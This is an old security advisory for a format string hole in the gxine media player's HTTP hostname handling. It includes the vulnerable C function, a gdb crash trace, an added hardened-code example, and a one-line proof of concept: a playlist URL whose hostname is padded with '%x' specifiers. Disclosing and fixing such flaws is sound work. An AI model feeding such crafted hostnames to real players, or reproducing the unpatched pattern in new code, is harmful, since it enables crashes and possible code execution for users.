pst.advisory : gxine remote exploitable . opensource is god .lol windows
Source: www.0xbadexworm.org  Author: jsk  Published: 2005-05-31


Systems affected:

gxine 0.44 0.43 0.42 0.41


no affected

no all exploitable


1: why: it is a format string vulnerability in the HTTP hostname. New Firefox can run gxine in many linux DS...

so it is very dangerous!!!!!!

2:tips:

void v_display_message (const gchar *title, GtkMessageType type,
                        const gchar *fmt, va_list ap)
{
  GtkWidget *dialog;
  gchar *msg;
  gboolean modal = (fmt == NULL);

  /* a NULL fmt means "modal": the real format is the first vararg */
  if (modal)
    fmt = va_arg (ap, const gchar *);

  /* msg now contains the attacker-controlled hostname */
  msg = g_strdup_vprintf (fmt, ap);
  va_end (ap);

  /* boom: msg is passed as the format string here;
     it should be ... GTK_BUTTONS_CLOSE, "%s", msg */
  dialog = gtk_message_dialog_new (NULL, GTK_DIALOG_DESTROY_WITH_PARENT, type,
                                   GTK_BUTTONS_CLOSE, msg);

  gtk_window_set_title (GTK_WINDOW (dialog), title);
  gtk_window_set_position (GTK_WINDOW (dialog), GTK_WIN_POS_CENTER);

  if (modal)
    gtk_window_set_modal (GTK_WINDOW (dialog), TRUE);

  g_signal_connect (G_OBJECT (dialog), "response",
                    G_CALLBACK (response_cb), NULL);
  g_object_set_data (G_OBJECT (dialog), "msg", msg);
  gtk_widget_show (dialog);
}


Call chain (callee first):

v_display_message () <--- display_error () (and many other functions) <--- report_error () <--- http_open ()
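
Added example (not from the advisory or the gxine source): a stand-alone C model of the call path above with the fix applied, i.e. the expanded message is passed as data behind a constant "%s". dialog_new(), the *_fixed names, count_conversions(), the error text and the sample hostname are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
static char dialog_text[512];            /* text the "dialog" would display */

/* Hypothetical stand-in for gtk_message_dialog_new(): its last named argument
 * is a printf format (gcc/clang can flag dialog_new(msg) via -Wformat-security). */
__attribute__((format(printf, 1, 2)))
static void dialog_new(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(dialog_text, sizeof dialog_text, fmt, ap);
    va_end(ap);
}

/* Hardened v_display_message(): expand the caller's format once, then pass
 * the result as data behind a constant "%s". */
static void v_display_message_fixed(const char *fmt, va_list ap)
{
    char msg[512];
    vsnprintf(msg, sizeof msg, fmt, ap);
    dialog_new("%s", msg);               /* vulnerable form: dialog_new(msg) */
}

static const char *display_error_fixed(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    v_display_message_fixed(fmt, ap);
    va_end(ap);
    return dialog_text;
}

/* Audit helper (approximate): how many conversions would a string trigger
 * if it were used as a format? "%%" is a literal percent sign. */
static int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++)
        if (s[0] == '%' && s[1] != '\0')
            n += (*++s != '%');          /* step past the byte after '%' */
    return n;
}

int main(void)
{
    /* constructed error text and hostname, shaped like the proof-of-concept */
    puts(display_error_fixed("Cannot open http://%s", "AAAAA%x%x%x"));
    return 0;
}
```

With the fix, the dialog text contains the hostname's %x sequences literally; count_conversions() can be used to flag such hostnames in playlists or logs.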


3:more show


Program received signal SIGSEGV, Segmentation fault.
0x405cdc43 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x405cdc43 in vfprintf () from /lib/libc.so.6
#1 0x405ec976 in vasprintf () from /lib/libc.so.6
#2 0x405493d7 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#3 0x40539674 in g_strdup_vprintf () from /usr/lib/libglib-2.0.so.0
#4 0x40217391 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#5 0x0806dc83 in v_display_message ()
#6 0x0806dda2 in display_error ()
#7 0x0806cf45 in report_error ()
#8 0x0806d278 in http_open ()
Previous frame inner to this frame (corrupt stack?)
(gdb) x/i $eip
0x405cdc43 <vfprintf+10195>: mov %ecx,(%eax)


4: A LAME proof-of-concept

cat fmtexp.ram

http://AAAAA%x%x%x%x%x%x%x%x%x%x%x%...paihb/42tj02.rm


CREDIT:

jsk:exworm (www.0xbadexworm.org) discovered this vulnerability

Thanks: all members of PST and doris


 